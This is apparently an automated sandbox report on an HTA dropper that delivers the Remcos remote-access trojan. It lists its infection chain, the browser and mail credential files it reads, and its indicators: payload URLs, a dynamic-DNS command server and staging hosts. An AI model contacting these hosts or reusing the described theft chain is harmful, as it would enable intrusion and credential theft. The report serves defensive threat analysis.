                        Source: Yara matchFile source: 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8136, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_0040B21B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db12_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: ESMTPPassword15_2_004033F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword15_2_00402DB3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword15_2_00402DB3
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8136, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2916, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-GH3PRLJump to behavior
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.4186207219.000000000244F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4182814346.0000000000669000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4182814346.0000000000628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4182814346.0000000000650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8136, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: cmd.exe12_2_00405042
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information111
                        Scripting
                        Valid Accounts11
                        Native API
                        111
                        Scripting
                        1
                        DLL Side-Loading
                        1
                        Deobfuscate/Decode Files or Information
                        2
                        OS Credential Dumping
                        2
                        System Time Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Web Service
                        Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution
                        1
                        DLL Side-Loading
                        1
                        Bypass User Account Control
                        2
                        Obfuscated Files or Information
                        211
                        Input Capture
                        1
                        Account Discovery
                        Remote Desktop Protocol1
                        Data from Local System
                        12
                        Ingress Tool Transfer
                        Exfiltration Over Bluetooth1
                        Defacement
                        Email AddressesDNS ServerDomain Accounts132
                        Command and Scripting Interpreter
                        1
                        Windows Service
                        1
                        Access Token Manipulation
                        1
                        DLL Side-Loading
                        2
                        Credentials in Registry
                        1
                        System Service Discovery
                        SMB/Windows Admin Shares11
                        Email Collection
                        21
                        Encrypted Channel
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        Service Execution
                        Login Hook1
                        Windows Service
                        1
                        Bypass User Account Control
                        3
                        Credentials In Files
                        3
                        File and Directory Discovery
                        Distributed Component Object Model211
                        Input Capture
                        1
                        Remote Access Software
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts3
                        PowerShell
                        Network Logon Script422
                        Process Injection
                        1
                        Masquerading
                        LSA Secrets39
                        System Information Discovery
                        SSH3
                        Clipboard Data
                        2
                        Non-Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                        Virtualization/Sandbox Evasion
                        Cached Domain Credentials31
                        Security Software Discovery
                        VNCGUI Input Capture213
                        Application Layer Protocol
                        Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Access Token Manipulation
                        DCSync21
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job422
                        Process Injection
                        Proc Filesystem4
                        Process Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        Application Window Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                        System Owner/User Discovery
                        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574254 Sample: greatattitudewithnicefeatru... Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 61 submarrine.duckdns.org 2->61 63 paste.ee 2->63 65 3 other IPs or domains 2->65 81 Suricata IDS alerts for network traffic 2->81 83 Found malware configuration 2->83 85 Malicious sample detected (through community Yara rule) 2->85 91 16 other signatures 2->91 12 mshta.exe 1 2->12         started        signatures3 87 Uses dynamic DNS services 61->87 89 Connects to a pastebin service (likely for C&C) 63->89 process4 signatures5 111 Suspicious command line found 12->111 113 PowerShell case anomaly found 12->113 15 cmd.exe 1 12->15         started        process6 signatures7 121 Detected Cobalt Strike Beacon 15->121 123 Suspicious powershell command line found 15->123 125 Wscript starts Powershell (via cmd or directly) 15->125 127 PowerShell case anomaly found 15->127 18 powershell.exe 40 15->18         started        23 conhost.exe 15->23         started        process8 dnsIp9 67 23.95.235.29, 49732, 80 AS-COLOCROSSINGUS United States 18->67 53 verynicebeautifulp...lifekidsgivenme.vbS, Unicode 18->53 dropped 55 C:\Users\user\AppData\...\1wf2prhw.cmdline, Unicode 18->55 dropped 93 Loading BitLocker PowerShell Module 18->93 25 wscript.exe 1 18->25         started        28 csc.exe 3 18->28         started        file10 signatures11 process12 file13 103 Detected Cobalt Strike Beacon 25->103 105 Suspicious powershell command line found 25->105 107 Wscript starts Powershell (via cmd or directly) 25->107 109 2 other signatures 25->109 31 powershell.exe 15 16 25->31         started        59 C:\Users\user\AppData\Local\...\1wf2prhw.dll, PE32 28->59 dropped 35 cvtres.exe 1 28->35         started        signatures14 process15 dnsIp16 73 cloudinary.map.fastly.net 151.101.1.137, 443, 49733 FASTLYUS United States 31->73 75 paste.ee 104.21.84.67, 443, 49740 CLOUDFLARENETUS United States 31->75 77 Writes to foreign memory regions 31->77 79 Injects a PE file into a foreign processes 31->79 37 CasPol.exe 3 15 31->37         started        42 conhost.exe 31->42         started        signatures17 process18 dnsIp19 69 submarrine.duckdns.org 192.3.101.149, 49741, 49742, 6946 AS-COLOCROSSINGUS United States 37->69 71 geoplugin.net 178.237.33.50, 49743, 80 ATOM86-ASATOM86NL Netherlands 37->71 57 C:\ProgramData\remcos\logs.dat, data 37->57 dropped 95 Contains functionality to bypass UAC (CMSTPLUA) 37->95 97 Detected Remcos RAT 37->97 99 Tries to steal Mail credentials (via file registry) 37->99 101 8 other signatures 37->101 44 CasPol.exe 37->44         started        47 CasPol.exe 37->47         started        49 CasPol.exe 14 37->49         started        51 CasPol.exe 37->51         started        file20 signatures21 process22 signatures23 115 Tries to steal Instant Messenger accounts or passwords 44->115 117 Tries to steal Mail credentials (via file / registry access) 44->117 119 Tries to harvest and steal browser information (history, passwords, etc) 47->119

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta33%VirustotalBrowse
                        greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta24%ReversingLabsScript-WScript.Trojan.Asthma
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFntLMEM0%Avira URL Cloudsafe
                        http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF0%Avira URL Cloudsafe
                        http://23.95.235.29/.Automation.resources0%Avira URL Cloudsafe
                        http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF90%Avira URL Cloudsafe
                        http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFf0%Avira URL Cloudsafe
                        http://23.95.235.29/90/veryniceb0%Avira URL Cloudsafe
                        http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFa0%Avira URL Cloudsafe
                        submarrine.duckdns.org0%Avira URL Cloudsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        paste.ee
                        104.21.84.67
                        truefalse
                          high
                          geoplugin.net
                          178.237.33.50
                          truefalse
                            high
                            cloudinary.map.fastly.net
                            151.101.1.137
                            truefalse
                              high
                              submarrine.duckdns.org
                              192.3.101.149
                              truetrue
                                unknown
                                res.cloudinary.com
                                unknown
                                unknownfalse
                                  high
                                  NameMaliciousAntivirus DetectionReputation
                                  https://paste.ee/r/Bdiyv/0false
                                    high
                                    http://geoplugin.net/json.gpfalse
                                      high
                                      http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      submarrine.duckdns.orgtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgfalse
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1850483491.0000000005F9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1845557104.0000000005088000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.imvu.comrCasPol.exe, 00000010.00000002.2133399989.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                              high
                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2076283466.0000000004957000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1845557104.0000000005088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2076283466.0000000004957000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://go.micropowershell.exe, 00000003.00000002.1845557104.000000000541F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contoso.com/Licensepowershell.exe, 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.google.com;powershell.exe, 00000007.00000002.2076283466.0000000004A6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.imvu.comCasPol.exe, CasPol.exe, 00000010.00000002.2133399989.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            high
                                                            https://contoso.com/Iconpowershell.exe, 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://geoplugin.net/json.gp4CasPol.exe, 0000000C.00000002.4182814346.0000000000669000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF9powershell.exe, 00000003.00000002.1852317348.0000000007754000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFntLMEMpowershell.exe, 00000003.00000002.1843837041.0000000003138000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://analytics.paste.eepowershell.exe, 00000007.00000002.2076283466.0000000004A6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.nirsoft.netCasPol.exe, 0000000D.00000002.2140614877.0000000000F64000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://23.95.235.29/.Automation.resourcespowershell.exe, 00000003.00000002.1854595650.00000000086AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://go.microspowershell.exe, 00000003.00000002.1845557104.000000000541F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2076283466.0000000004957000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comCasPol.exe, 00000010.00000002.2133399989.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                          high
                                                                          http://crl.mipowershell.exe, 00000003.00000002.1852317348.0000000007754000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.google.compowershell.exe, 00000007.00000002.2076283466.0000000004A6F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, CasPol.exe, 00000010.00000002.2133399989.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                              high
                                                                              http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFfpowershell.exe, 00000003.00000002.1852317348.0000000007754000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://res.cloudinary.compowershell.exe, 00000007.00000002.2076283466.0000000004957000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgtpowershell.exe, 00000007.00000002.2076283466.0000000004957000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://23.95.235.29/90/verynicebpowershell.exe, 00000003.00000002.1845557104.000000000541F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://geoplugin.net/json.gp/Cpowershell.exe, 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1845557104.0000000004F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2076283466.0000000004801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFapowershell.exe, 00000003.00000002.1854595650.00000000086AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1845557104.0000000005088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://contoso.com/powershell.exe, 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1850483491.0000000005F9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://analytics.paste.ee;powershell.exe, 00000007.00000002.2076283466.0000000004A6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.google.com/accounts/serviceloginCasPol.exefalse
                                                                                                high
                                                                                                https://login.yahoo.com/config/loginCasPol.exefalse
                                                                                                  high
                                                                                                  https://cdnjs.cloudflare.compowershell.exe, 00000007.00000002.2076283466.0000000004A6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.microsoft.cpowershell.exe, 00000003.00000002.1854595650.00000000086D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://cdnjs.cloudflare.com;powershell.exe, 00000007.00000002.2076283466.0000000004A6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.nirsoft.net/CasPol.exe, 00000010.00000002.2133399989.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1845557104.0000000004F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2076283466.0000000004801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://secure.gravatar.compowershell.exe, 00000007.00000002.2076283466.0000000004A6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://themes.googleusercontent.compowershell.exe, 00000007.00000002.2076283466.0000000004A6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.ebuddy.comCasPol.exe, CasPol.exe, 00000010.00000002.2133399989.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs
                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  23.95.235.29
                                                                                                                  unknownUnited States
                                                                                                                  36352AS-COLOCROSSINGUStrue
                                                                                                                  192.3.101.149
                                                                                                                  submarrine.duckdns.orgUnited States
                                                                                                                  36352AS-COLOCROSSINGUStrue
                                                                                                                  151.101.1.137
                                                                                                                  cloudinary.map.fastly.netUnited States
                                                                                                                  54113FASTLYUSfalse
                                                                                                                  178.237.33.50
                                                                                                                  geoplugin.netNetherlands
                                                                                                                  8455ATOM86-ASATOM86NLfalse
                                                                                                                  104.21.84.67
                                                                                                                  paste.eeUnited States
                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                  Analysis ID:1574254
                                                                                                                  Start date and time:2024-12-13 07:37:09 +01:00
                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                  Overall analysis duration:0h 10m 13s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                  Number of analysed new started processes analysed:18
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Sample name:greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.rans.phis.troj.spyw.expl.evad.winHTA@26/20@4/5
                                                                                                                  EGA Information:
                                                                                                                  • Successful, ratio: 85.7%
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 99%
                                                                                                                  • Number of executed functions: 169
                                                                                                                  • Number of non-executed functions: 314
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .hta
                                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                  • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                  • Execution Graph export aborted for target mshta.exe, PID 7280 because there are no executed function
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                  TimeTypeDescription
                                                                                                                  01:38:07API Interceptor124x Sleep call for process: powershell.exe modified
                                                                                                                  01:39:12API Interceptor5896327x Sleep call for process: CasPol.exe modified
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  23.95.235.29Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                                  • 23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta
                                                                                                                  nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                  • 23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF
                                                                                                                  invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                                                                  • 23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta
                                                                                                                  Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                                                                  • 23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta
                                                                                                                  192.3.101.149nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                    invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                                                                      thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                        Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                          seethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                            pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                              seemebestthingswhichevermadebybestthingsgodown.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                                CI.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                  seethebestthingswithgoodthingswithgreatthignsfor.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                                    1731343866c2de3056a60ef2333b3e4532593a69f279ecfa2002460801978b2e618aaa77bc130.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                      151.101.1.137creamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                        Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                          stage2.ps1Get hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                                                                            nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                              Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                    16547.jsGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                        nr101612_Order.wsfGet hashmaliciousRemcosBrowse
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          cloudinary.map.fastly.netcreamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                                          • 151.101.1.137
                                                                                                                                                          Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 151.101.129.137
                                                                                                                                                          Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 151.101.1.137
                                                                                                                                                          stage2.ps1Get hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                                                                                          • 151.101.193.137
                                                                                                                                                          nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                                          • 151.101.1.137
                                                                                                                                                          invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 151.101.65.137
                                                                                                                                                          Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 151.101.1.137
